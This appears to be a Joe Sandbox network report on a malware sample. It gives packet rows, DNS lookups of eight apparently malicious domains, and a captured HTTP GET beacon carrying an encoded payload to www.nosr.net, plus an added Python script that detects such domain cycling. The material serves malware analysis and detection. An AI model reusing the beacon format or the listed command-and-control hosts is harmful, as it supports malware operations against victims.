Sep 18, 2024 09:03:46.873007059 CEST | 57966 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:46.873029947 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.873037100 CEST | 57966 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:46.873047113 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.873059988 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.873075008 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.873090029 CEST | 57966 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:46.873117924 CEST | 57966 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:46.877980947 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.878067017 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.878154993 CEST | 57966 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:46.878602982 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.878618002 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.878680944 CEST | 57966 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:46.879843950 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.930296898 CEST | 57966 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:46.959538937 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.959568977 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.959583998 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.959636927 CEST | 57966 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:47.774147034 CEST | 57966 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:48.793613911 CEST | 57967 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:48.798628092 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:48.798738003 CEST | 57967 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:48.813105106 CEST | 57967 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:48.817914963 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:48.818084002 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.478764057 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.478785992 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.478799105 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.478812933 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.478827000 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.478843927 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.478862047 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.478868008 CEST | 57967 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:49.478883028 CEST | 57967 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:49.478893042 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.478934050 CEST | 57967 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:49.479058027 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.479080915 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.479114056 CEST | 57967 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:49.483865023 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.483880043 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.483896971 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.483910084 CEST | 57967 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:49.524024963 CEST | 57967 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:49.569202900 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.569295883 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.569310904 CEST | 80 | 57967 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:49.569343090 CEST | 57967 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:49.569364071 CEST | 57967 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:50.320983887 CEST | 57967 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:51.339735031 CEST | 57969 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:51.344813108 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.344938040 CEST | 57969 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:51.352747917 CEST | 57969 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:51.357750893 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.953883886 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.953902960 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.953913927 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.953923941 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.953934908 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.953946114 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.953958988 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.953974009 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.953975916 CEST | 57969 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:51.953989983 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.954003096 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.954061985 CEST | 57969 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:51.954092026 CEST | 57969 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:51.958800077 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.958832026 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:51.958842993 CEST | 80 | 57969 | 162.0.213.94 | 192.168.2.6
              Sep 18, 2024 09:03:51.958858013 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:51.958895922 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:51.958960056 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:51.959120989 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:52.008424044 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:52.042584896 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:52.043503046 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:52.043519974 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:52.043646097 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:52.043646097 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:52.046206951 CEST5796980192.168.2.6162.0.213.94
              Sep 18, 2024 09:03:52.051106930 CEST8057969162.0.213.94192.168.2.6
              Sep 18, 2024 09:03:57.074094057 CEST5797080192.168.2.63.33.130.190
              Sep 18, 2024 09:03:57.078944921 CEST80579703.33.130.190192.168.2.6
              Sep 18, 2024 09:03:57.079029083 CEST5797080192.168.2.63.33.130.190
              Sep 18, 2024 09:03:57.090363026 CEST5797080192.168.2.63.33.130.190
              Sep 18, 2024 09:03:57.095312119 CEST80579703.33.130.190192.168.2.6
              Sep 18, 2024 09:03:57.763799906 CEST80579703.33.130.190192.168.2.6
              Sep 18, 2024 09:03:57.763892889 CEST5797080192.168.2.63.33.130.190
              Sep 18, 2024 09:03:57.764736891 CEST80579703.33.130.190192.168.2.6
              Sep 18, 2024 09:03:57.764797926 CEST5797080192.168.2.63.33.130.190
              Sep 18, 2024 09:03:58.602335930 CEST5797080192.168.2.63.33.130.190
              Sep 18, 2024 09:03:58.607506037 CEST80579703.33.130.190192.168.2.6
              Sep 18, 2024 09:03:59.621072054 CEST5797180192.168.2.63.33.130.190
              Sep 18, 2024 09:03:59.630793095 CEST80579713.33.130.190192.168.2.6
              Sep 18, 2024 09:03:59.630881071 CEST5797180192.168.2.63.33.130.190
              Sep 18, 2024 09:03:59.641825914 CEST5797180192.168.2.63.33.130.190
              Sep 18, 2024 09:03:59.646904945 CEST80579713.33.130.190192.168.2.6
              Sep 18, 2024 09:04:00.089026928 CEST80579713.33.130.190192.168.2.6
              Sep 18, 2024 09:04:00.089121103 CEST5797180192.168.2.63.33.130.190
              Sep 18, 2024 09:04:01.222692966 CEST5797180192.168.2.63.33.130.190
              Sep 18, 2024 09:04:01.227695942 CEST80579713.33.130.190192.168.2.6
              Sep 18, 2024 09:04:02.231420994 CEST5797280192.168.2.63.33.130.190
              Sep 18, 2024 09:04:02.236464977 CEST80579723.33.130.190192.168.2.6
              Sep 18, 2024 09:04:02.236592054 CEST5797280192.168.2.63.33.130.190
              Sep 18, 2024 09:04:02.246539116 CEST5797280192.168.2.63.33.130.190
              Sep 18, 2024 09:04:02.255692959 CEST80579723.33.130.190192.168.2.6
              Sep 18, 2024 09:04:02.257383108 CEST80579723.33.130.190192.168.2.6
              Sep 18, 2024 09:04:03.649604082 CEST80579723.33.130.190192.168.2.6
              Sep 18, 2024 09:04:03.651444912 CEST5797280192.168.2.63.33.130.190
              Sep 18, 2024 09:04:03.758493900 CEST5797280192.168.2.63.33.130.190
              Sep 18, 2024 09:04:03.763605118 CEST80579723.33.130.190192.168.2.6
              Sep 18, 2024 09:04:05.386298895 CEST5797380192.168.2.63.33.130.190
              Sep 18, 2024 09:04:05.391592979 CEST80579733.33.130.190192.168.2.6
              Sep 18, 2024 09:04:05.395431995 CEST5797380192.168.2.63.33.130.190
              Sep 18, 2024 09:04:05.399148941 CEST5797380192.168.2.63.33.130.190
              Sep 18, 2024 09:04:05.404244900 CEST80579733.33.130.190192.168.2.6
              Sep 18, 2024 09:04:05.880235910 CEST80579733.33.130.190192.168.2.6
              Sep 18, 2024 09:04:05.880253077 CEST80579733.33.130.190192.168.2.6
              Sep 18, 2024 09:04:05.882313967 CEST5797380192.168.2.63.33.130.190
              Sep 18, 2024 09:04:05.882843018 CEST5797380192.168.2.63.33.130.190
              Sep 18, 2024 09:04:05.887650013 CEST80579733.33.130.190192.168.2.6
               Timestamp | Source Port | Dest Port | Source IP | Dest IP
               Sep 18, 2024 09:02:37.989675045 CEST | 60887 | 53 | 192.168.2.6 | 1.1.1.1
               Sep 18, 2024 09:02:38.218595982 CEST | 53 | 60887 | 1.1.1.1 | 192.168.2.6
               Sep 18, 2024 09:02:41.860179901 CEST | 53 | 53656 | 162.159.36.2 | 192.168.2.6
               Sep 18, 2024 09:02:42.364696026 CEST | 53 | 58859 | 1.1.1.1 | 192.168.2.6
               Sep 18, 2024 09:02:53.949450016 CEST | 64932 | 53 | 192.168.2.6 | 1.1.1.1
               Sep 18, 2024 09:02:53.959038973 CEST | 53 | 64932 | 1.1.1.1 | 192.168.2.6
               Sep 18, 2024 09:03:02.011790037 CEST | 53937 | 53 | 192.168.2.6 | 1.1.1.1
               Sep 18, 2024 09:03:02.038858891 CEST | 53 | 53937 | 1.1.1.1 | 192.168.2.6
               Sep 18, 2024 09:03:15.486140013 CEST | 49248 | 53 | 192.168.2.6 | 1.1.1.1
               Sep 18, 2024 09:03:15.644802094 CEST | 53 | 49248 | 1.1.1.1 | 192.168.2.6
               Sep 18, 2024 09:03:29.058703899 CEST | 56573 | 53 | 192.168.2.6 | 1.1.1.1
               Sep 18, 2024 09:03:29.498281002 CEST | 53 | 56573 | 1.1.1.1 | 192.168.2.6
               Sep 18, 2024 09:03:43.105700016 CEST | 56546 | 53 | 192.168.2.6 | 1.1.1.1
               Sep 18, 2024 09:03:43.693528891 CEST | 53 | 56546 | 1.1.1.1 | 192.168.2.6
               Sep 18, 2024 09:03:57.059041023 CEST | 60037 | 53 | 192.168.2.6 | 1.1.1.1
               Sep 18, 2024 09:03:57.071719885 CEST | 53 | 60037 | 1.1.1.1 | 192.168.2.6
               Sep 18, 2024 09:04:10.887487888 CEST | 52170 | 53 | 192.168.2.6 | 1.1.1.1
               Sep 18, 2024 09:04:10.901107073 CEST | 53 | 52170 | 1.1.1.1 | 192.168.2.6
               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
               Sep 18, 2024 09:02:37.989675045 CEST | 192.168.2.6 | 1.1.1.1 | 0x7ff2 | Standard query (0) | www.nosr.net | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:02:53.949450016 CEST | 192.168.2.6 | 1.1.1.1 | 0xb36 | Standard query (0) | www.monos.shop | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:03:02.011790037 CEST | 192.168.2.6 | 1.1.1.1 | 0x956 | Standard query (0) | www.complexity.pub | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:03:15.486140013 CEST | 192.168.2.6 | 1.1.1.1 | 0x64de | Standard query (0) | www.nevsehir-nakliyat.xyz | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:03:29.058703899 CEST | 192.168.2.6 | 1.1.1.1 | 0x93e | Standard query (0) | www.masteriocp.online | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:03:43.105700016 CEST | 192.168.2.6 | 1.1.1.1 | 0x547 | Standard query (0) | www.kryto.top | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:03:57.059041023 CEST | 192.168.2.6 | 1.1.1.1 | 0x2832 | Standard query (0) | www.angelenterprise.biz | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:04:10.887487888 CEST | 192.168.2.6 | 1.1.1.1 | 0xbc15 | Standard query (0) | www.dyme.tech | A (IP address) | IN (0x0001) | false
               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
               Sep 18, 2024 09:02:38.218595982 CEST | 1.1.1.1 | 192.168.2.6 | 0x7ff2 | No error (0) | www.nosr.net | nosr.net | - | CNAME (Canonical name) | IN (0x0001) | false
               Sep 18, 2024 09:02:38.218595982 CEST | 1.1.1.1 | 192.168.2.6 | 0x7ff2 | No error (0) | nosr.net | - | 82.221.128.183 | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:02:53.959038973 CEST | 1.1.1.1 | 192.168.2.6 | 0xb36 | Name error (3) | www.monos.shop | none | none | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:03:02.038858891 CEST | 1.1.1.1 | 192.168.2.6 | 0x956 | No error (0) | www.complexity.pub | - | 217.160.0.127 | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:03:15.644802094 CEST | 1.1.1.1 | 192.168.2.6 | 0x64de | No error (0) | www.nevsehir-nakliyat.xyz | redirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
               Sep 18, 2024 09:03:15.644802094 CEST | 1.1.1.1 | 192.168.2.6 | 0x64de | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
               Sep 18, 2024 09:03:15.644802094 CEST | 1.1.1.1 | 192.168.2.6 | 0x64de | No error (0) | natroredirect.natrocdn.com | - | 85.159.66.93 | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:03:29.498281002 CEST | 1.1.1.1 | 192.168.2.6 | 0x93e | No error (0) | www.masteriocp.online | dns.ladipage.com | - | CNAME (Canonical name) | IN (0x0001) | false
               Sep 18, 2024 09:03:29.498281002 CEST | 1.1.1.1 | 192.168.2.6 | 0x93e | No error (0) | dns.ladipage.com | - | 13.228.81.39 | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:03:29.498281002 CEST | 1.1.1.1 | 192.168.2.6 | 0x93e | No error (0) | dns.ladipage.com | - | 18.139.62.226 | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:03:29.498281002 CEST | 1.1.1.1 | 192.168.2.6 | 0x93e | No error (0) | dns.ladipage.com | - | 54.179.173.60 | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:03:43.693528891 CEST | 1.1.1.1 | 192.168.2.6 | 0x547 | No error (0) | www.kryto.top | - | 162.0.213.94 | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:03:57.071719885 CEST | 1.1.1.1 | 192.168.2.6 | 0x2832 | No error (0) | www.angelenterprise.biz | angelenterprise.biz | - | CNAME (Canonical name) | IN (0x0001) | false
               Sep 18, 2024 09:03:57.071719885 CEST | 1.1.1.1 | 192.168.2.6 | 0x2832 | No error (0) | angelenterprise.biz | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:03:57.071719885 CEST | 1.1.1.1 | 192.168.2.6 | 0x2832 | No error (0) | angelenterprise.biz | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:04:10.901107073 CEST | 1.1.1.1 | 192.168.2.6 | 0xbc15 | No error (0) | www.dyme.tech | - | 13.248.169.48 | A (IP address) | IN (0x0001) | false
               Sep 18, 2024 09:04:10.901107073 CEST | 1.1.1.1 | 192.168.2.6 | 0xbc15 | No error (0) | www.dyme.tech | - | 76.223.54.146 | A (IP address) | IN (0x0001) | false
              • www.nosr.net
              • www.complexity.pub
              • www.nevsehir-nakliyat.xyz
              • www.masteriocp.online
              • www.kryto.top
              • www.angelenterprise.biz
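
               Added example (not part of the Joe Sandbox report): the DNS query and answer rows above, joined on transaction ID and checked for the pattern they show, which is one A query for a different registrable domain roughly every 14 seconds across eight unrelated TLDs, with one NXDOMAIN (www.monos.shop) in the run. The rows are transcribed from the two tables above; the pairing, the cadence statistics, the crude registrable-domain helper and the thresholds (window and minimum distinct domains) are this example's choices, not the sandbox's own scoring.

```python
from dataclasses import dataclass
from datetime import datetime

# Rows transcribed from the report's DNS tables: queries as (timestamp, transaction id, name),
# answers as (timestamp, transaction id, reply code, A records). Nanoseconds truncated to microseconds.
QUERIES = [
    ("2024-09-18 09:02:37.989675", 0x7ff2, "www.nosr.net"),
    ("2024-09-18 09:02:53.949450", 0x0b36, "www.monos.shop"),
    ("2024-09-18 09:03:02.011790", 0x0956, "www.complexity.pub"),
    ("2024-09-18 09:03:15.486140", 0x64de, "www.nevsehir-nakliyat.xyz"),
    ("2024-09-18 09:03:29.058703", 0x093e, "www.masteriocp.online"),
    ("2024-09-18 09:03:43.105700", 0x0547, "www.kryto.top"),
    ("2024-09-18 09:03:57.059041", 0x2832, "www.angelenterprise.biz"),
    ("2024-09-18 09:04:10.887487", 0xbc15, "www.dyme.tech"),
]
ANSWERS = [
    ("2024-09-18 09:02:38.218595", 0x7ff2, 0, ["82.221.128.183"]),
    ("2024-09-18 09:02:53.959038", 0x0b36, 3, []),                       # Name error (3) = NXDOMAIN
    ("2024-09-18 09:03:02.038858", 0x0956, 0, ["217.160.0.127"]),
    ("2024-09-18 09:03:15.644802", 0x64de, 0, ["85.159.66.93"]),
    ("2024-09-18 09:03:29.498281", 0x093e, 0, ["13.228.81.39", "18.139.62.226", "54.179.173.60"]),
    ("2024-09-18 09:03:43.693528", 0x0547, 0, ["162.0.213.94"]),
    ("2024-09-18 09:03:57.071719", 0x2832, 0, ["3.33.130.190", "15.197.148.33"]),
    ("2024-09-18 09:04:10.901107", 0xbc15, 0, ["13.248.169.48", "76.223.54.146"]),
]
FMT = "%Y-%m-%d %H:%M:%S.%f"


@dataclass
class Resolution:
    name: str
    queried_at: datetime
    rcode: int          # 0 = NOERROR, 3 = NXDOMAIN
    addresses: list
    rtt_s: float


def pair_dns(queries, answers):
    """Join queries to answers on transaction ID, as the stub resolver does; answers with
    no matching query (e.g. the stray 53656/58859 replies in the UDP table) are ignored."""
    by_id = {tid: (datetime.strptime(ts, FMT), rcode, addrs) for ts, tid, rcode, addrs in answers}
    out = []
    for ts, tid, name in queries:
        q_at = datetime.strptime(ts, FMT)
        if tid not in by_id:
            continue
        a_at, rcode, addrs = by_id[tid]
        out.append(Resolution(name, q_at, rcode, addrs, (a_at - q_at).total_seconds()))
    return sorted(out, key=lambda r: r.queried_at)


def registrable(name):
    """Crude eTLD+1 (last two labels). Good enough for this list; use a public-suffix
    library for ccTLD second-level registries such as .co.uk."""
    return ".".join(name.split(".")[-2:])


def domain_cycling_report(resolutions, window_s=180, min_domains=5):
    """Flag one client walking a list of unrelated domains at a steady cadence. Thresholds
    are this example's assumptions; tune them against your own resolver logs."""
    if not resolutions:
        return {"flagged": False}
    gaps = [(b.queried_at - a.queried_at).total_seconds()
            for a, b in zip(resolutions, resolutions[1:])]
    span = (resolutions[-1].queried_at - resolutions[0].queried_at).total_seconds()
    domains = {registrable(r.name) for r in resolutions}
    tlds = {r.name.rsplit(".", 1)[-1] for r in resolutions}
    return {
        "flagged": span <= window_s and len(domains) >= min_domains,
        "distinct_domains": len(domains),
        "distinct_tlds": len(tlds),
        "median_gap_s": sorted(gaps)[len(gaps) // 2] if gaps else None,
        "nxdomain": [r.name for r in resolutions if r.rcode == 3],
        "resolved": {r.name: r.addresses for r in resolutions if r.addresses},
    }


if __name__ == "__main__":
    for k, v in domain_cycling_report(pair_dns(QUERIES, ANSWERS)).items():
        print(f"{k}: {v}")
```

               The median inter-query gap is the figure worth alerting on: a human browsing eight sites does not space the lookups 13.8 s apart, and the NXDOMAIN in the middle is consistent with a hard-coded candidate list that nobody bothered to register in full.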
               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
               0 | 192.168.2.6 | 49723 | 82.221.128.183 | 80 | 3196 | C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
               Timestamp | Bytes transferred | Direction | Data
               Sep 18, 2024 09:02:38.238545895 CEST | 505 | OUT | GET /ujbu/?O4s0=7rrhM&np=MTTknThtRCJj0ATwznqj01o1Cri3+JPfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLk94tH9MdVpcC/d4hhj8l3F2/cR0CQHBzLt4ZWoJ62kMu+v5Sa8M= HTTP/1.1
              Host: www.nosr.net
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US,en;q=0.5
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
               Sep 18, 2024 09:02:38.895858049 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Wed, 18 Sep 2024 07:02:37 GMT
              Server: Apache
              Accept-Ranges: bytes
              Cache-Control: no-cache, no-store, must-revalidate
              Pragma: no-cache
              Expires: 0
              Connection: close
              Transfer-Encoding: chunked
              Content-Type: text/html
              Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
              Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
               Sep 18, 2024 09:02:38.895900965 CEST | 1236 | IN | Data Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
              Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
               Sep 18, 2024 09:02:38.895914078 CEST | 448 | IN | Data Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
              Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
               Sep 18, 2024 09:02:38.895926952 CEST | 1236 | IN | Data Raw: 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 61 20 69 6d 67 20 7b 0a 20 20 20 20 20 20 20 20 20
              Data Ascii: a { text-decoration: none; } footer a img { border: 0; } .copyright { font-size: 10px; color: #3F4143; } @media (min-width: 768px) { .
               Sep 18, 2024 09:02:38.895937920 CEST | 1236 | IN | Data Raw: 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b
              Data Ascii: 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0KG
               Sep 18, 2024 09:02:38.895950079 CEST | 1236 | IN | Data Raw: 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 43 31 4e 62 59 31 56 53 6b 64 65 42 34 76 58 4d 48 30 4b 53 51 56 49 76 51 66 45 52 63 69 4d 70 63 61 46 74 57 34
              Data Ascii: IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l
